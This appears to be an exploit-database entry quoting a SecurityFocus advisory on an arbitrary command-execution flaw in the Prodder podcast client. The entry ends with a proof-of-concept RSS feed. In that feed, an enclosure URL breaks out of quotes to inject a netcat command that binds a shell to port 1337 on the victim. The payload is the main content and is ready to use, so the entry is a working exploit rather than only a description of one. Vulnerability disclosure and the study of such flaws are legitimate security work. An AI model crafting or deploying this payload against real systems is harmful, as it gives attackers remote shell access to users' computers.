7 lines
No EOL
678 B
Text
7 lines
No EOL
678 B
Text
source: https://www.securityfocus.com/bid/18068/info
|
|
|
|
Prodder is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this issue to execute arbitrary shell commands on the vulnerable computer in the context of the running application.
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl"?> <rss version="2.0"> <channel> <title>RedTeam Pentesting Example Malicious Server Feed</title> <item> <enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh -l -p 1337 & ';#'" length="241734" type="audio/mpeg" /> </item> </channel> </rss> |